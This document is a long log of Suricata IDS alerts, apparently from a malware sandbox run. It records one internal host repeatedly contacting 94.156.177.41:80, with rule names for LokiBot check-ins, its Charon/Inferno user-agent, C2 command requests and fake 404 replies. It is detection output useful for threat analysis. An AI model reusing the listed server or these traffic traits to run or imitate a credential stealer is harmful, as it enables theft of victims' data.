                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49721
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49736 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49818 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49713
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49818 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49818 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49773 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49773 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49833 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49833 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49833 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49818 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49793
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49787 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49732
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49787 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49787 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49799 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49836 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49833 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49833 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49833
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49773 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49818 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49775 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49775 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49775 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49773 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49773 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49710
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49836 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49836 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49818
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49828 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49775 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49775 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49736 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49836 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49755
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49736 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49736 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49775
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49787 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49787 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49736
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49828 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49773
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49828 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49799
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49828 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49828 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49781
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49836 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49828
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49787
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49836
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49811 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49811 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49811 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49811 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49811 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49811
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49823 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49823 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49823 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49848 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49848 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49848 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49823 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49823 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49848 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49848 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49854 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49854 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49823
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49854 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49854 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49854 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49863 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49848
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49859 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49863 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49859 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49863 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49841 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49841 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49859 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49854
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49841 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49863 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49863 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49859 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49859 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49859
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49863
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49888 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49888 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49888 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49885 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49885 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49906 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49906 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49873 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49873 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49885 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49888 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49896 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49896 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49906 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49896 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49900 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49900 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49900 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49906 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49888 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49896 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49896 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49841 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49900 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49900 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49896
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49917 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49917 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49917 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49949 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49917 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49873 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49885 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49885 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49867 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49873 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49885
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49917 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49841 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49949 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49841
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49888
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49906 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49867 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49867 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49962 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49949 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49962 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49962 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49949 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49949 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49867 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49867 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49962 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49949
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49962 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49906
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49917
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49873 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49900
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49924 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49978 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49929 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49960 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49960 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49960 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49978 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49924 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49973 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49924 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49968 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49978 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49968 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49962
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49968 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49929 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49978 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49937 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49924 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49873
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49924 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49929 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49935 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49935 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50000 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49937 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49960 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50000 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50000 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49968 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49978 -> 94.156.177.41:80
                          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49867
